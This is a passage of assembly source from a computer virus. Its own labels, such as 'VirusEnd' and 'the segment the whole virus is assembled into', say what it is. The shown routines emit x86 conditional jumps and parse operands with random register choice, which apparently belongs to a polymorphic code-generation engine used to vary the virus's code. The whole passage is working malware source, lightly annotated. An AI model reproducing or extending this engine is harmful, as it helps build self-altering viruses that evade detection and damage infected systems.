; -4..+3 bytes of the current output position, else 0F 8x rel32; both
; displacements are taken relative to the end of the 2- or 6-byte instruction.
; This only works for labels already recorded (backward jumps): an undefined
; label still holds -1 and yields a garbage displacement; there is no fix-up pass.
JxxProc:
movzx edx,byte ptr [ebx]                ; condition code
push edx
call GetOperand
pop edx

mov ebx,[SavedOffsets+ebp+eax]
sub ebx,edi

add ebx,4                               ; ebx = target - edi + 4

test ebx,0fffffff8h
jz OutPutSmallJump

mov al,0fh
stosb

mov al,10000000b
or eax,edx                              ; 0F 80h|cc
stosb

sub ebx,6+4                             ; rel32 = target - (start + 6)
mov eax,ebx
stosd
ret
|
||
|
||
|
||
; OutPutSmallJump - shared tail of JmpProc/JxxProc: emit 70h|edx (Jcc rel8)
; with rel8 = ebx - 6 = target - (start + 2).
; In: edx = condition code (low 4 bits), ebx = target - start + 4.
OutPutSmallJump:
mov al,01110000b
or eax,edx
stosb
mov eax,ebx
sub eax,2+4
stosb
ret

ret                                     ; unreachable (dead byte after the ret above)
|
||
|
||
|
||
; GetOperand - parse one operand at esi. The syntax is binary, not text:
;   optional '[' ... ']'      memory operand (sets type bit 8)
;   'S' + dword n            value = dword n of the table at PointerToDataSlack
;   'R' + byte               register: 'X' -> GetRandomReg (defined above this
;                            excerpt), otherwise an ASCII digit giving the
;                            index into RegistersBitValue (sets type bit 4)
;   anything else            that byte is the first of a dword immediate
; Out: eax = value; ebx = type (0 immediate, 4 register, 8 [absolute],
;      12 [register]); esi -> past the operand and its ']' if any;
;      edx = 0 on the 'S' and immediate paths, 4 on the register path.
; Clobbers ecx, edx.
GetOperand:
xor edx,edx
mov al,byte ptr [esi]
cmp al,'['
setz dl                                 ; 1 if bracketed
mov ecx,edx                             ; remembered so the closing ']' is skipped
add esi,edx
shl edx,3
mov ebx,edx ; ebx = 0 or 8

lodsb
cmp al,'S' ; A variable
jnz Label53

mov edx,[PointerToDataSlack+ebp]
lodsd                                   ; table index
mov eax,[edx+eax*4]
add esi,ecx                             ; skip ']'
xor edx,edx
ret

Label53:
cmp al,'R'
setz dl
shl edx,2
add ebx,edx ; ebx = ebx + (0 or 4)

test edx,edx ; is value
jz ReadValue

xor eax,eax
lodsb ; read register

cmp al,'X'
jz GetRandomReg                         ; tail-jump: random register choice (not in this excerpt)

sub eax,'0'                             ; fixed register index

add esi,ecx
ret

ReadValue:
lodsd                                   ; imm32 / absolute address
add esi,ecx
ret
|
||
|
||
; Return - a bare 'ret' used as the target of conditional early-outs
; (ReadOperands, FetchOpcode).
Return:
ret
|
||
|
||
; AsciiToNum - read one byte at esi and convert it from an ASCII digit to its
; value (0..9). No validation. Out: eax; esi advanced by 1.
AsciiToNum:
xor eax,eax
lodsb
sub eax,'0'
ret
|
||
|
||
|
||
ResidentcodeEnd:                        ; end of the resident part (its start marker is above this excerpt)



VirusEnd:                               ; end of the virus image; presumably where VSize/VirusSize are derived (definitions not in view)
_rsrc ends                              ; closes the segment the whole virus is assembled into
end Main                                ; entry point label 'Main' is above this excerpt
|